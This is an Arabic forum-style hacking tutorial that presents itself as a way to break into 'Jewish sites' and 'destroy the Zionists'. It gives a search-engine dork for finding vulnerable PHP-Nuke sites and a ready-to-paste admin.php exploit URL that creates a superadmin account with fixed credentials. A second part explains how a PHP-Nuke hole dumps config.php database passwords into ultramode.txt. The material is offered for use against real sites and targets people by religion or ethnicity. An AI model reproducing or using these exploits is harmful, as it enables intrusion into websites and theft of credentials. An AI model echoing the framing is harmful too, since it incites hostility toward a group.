شروحات سهله
طريقه سهله لاختراق المواقع اليهوديه
************************************
لكي ندمر الصهاينة . جئت لكم بكل شيئ .
****************************************
بالامكان ان تخترق موقع او منتدى فى اقل من دقيقة باستغلال ثغرة فى مجلة النيوك بي اتش بي
الخطوة الاول اذهب الى محرك بحث google وابحث عن "ultramode.txt"
المواقع نتائج البحث ابداء بفتح الواحد تلو الاخر وتعالى الى نهاية اسم الموقع وانسخ ما يلي:
admin.php?op=AddAuthor&add_aid=tigersha
rck&add_name=God&add_pwd=coolpass&
add_email=foo@bar.com&add_radminsuper=
1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
ثم اضغط انتر اذا صادفتك الصفحة التالية خانتين الاولى لاسم المستخدم والثانية للباسورد
واكتب فى الخانتين
username "tigersharck" and password "coolpass".
استمتع بعد دخولك بالموقع وان لم تنجح جرب مع اخر
لا اله الا الله محمد رسول الله


وهذا شرح لإختراق المواقع:
*************************
هذا الملف أكيد أي شخص يتعامل مع الـ PHP عارفه كويس وباعتقادي انه الكثير من الهكر عارفينه وأنا بهذا الموضوع المختصر أحاول أعرف فائدته .
- ماهو ملف الـ Config ؟
ملف الـ Config هو ملف يوجد في الكثير من سكربتات الـ PHP مثل منتديات vBulletin ومجلات الـ Nuke .
يحتوي هذا الملف على اسم مستخدم وكلمة مرور قاعدة البيانات الخاصة بالسكربت .
مثال:
$dbusername="إسم المستخدم لقاعدة البيانات";
$dbpassword="كلمة المرور لقاعدة البيانات";
$dbname="إسم قاعدة البيانات";
- مافائدة هذا الملف بالنسبة للمخترق ؟
فائدة هذا الملف أنك إذا استطعت تنزيله أو طبعه بإحدى الثغرات والإطلاع عليه فتجد بداخله اسم مستخم وكلمة مرور قاعدة البيانات كما أشرت سابقا وبهذا يمكنك الدخول على قاعدة البيانات والدخول إلى الجداول والحصول على الكثير من المعلومات.
-كيف يمكنني الحصول على هذا الملف أو عرضه ؟
هذا الملف يكون محمي بــ.htaccess ولانه من بامتداد php لايمكن عرضه من خلال المتصفح ولهذا لابد من استخدام إحدى الثغرات للحصول عليه وعرضعه .
- ثغرة في مجلة الـ Nuke تمكنك من طبع الملف وعرضه:
الثغرة:
http://www.server.net/admin.php?upl...e=ultramode.txt
=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
عمل الثغرة:
-=طبع ملف الكونفيج config.php الى الملف النصي الموجودultramode.txt لن تحتاج تحميل ملف نصي لطبع الملف
-=ما عليك سوى الدخول الى http://server.com/ultramode.txt وستجد باس واليوزر التابع لقاعدة بيانات الموقع=-
=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
ملاحظات
1- بدل server.com بالموقع المراد اختراقه.
2- تأكد من موقع المجلة مثال : http://server.com/nuke
3- هذه الثغرة لا تعمل مع اصدار 5.2 كما يظن البعض...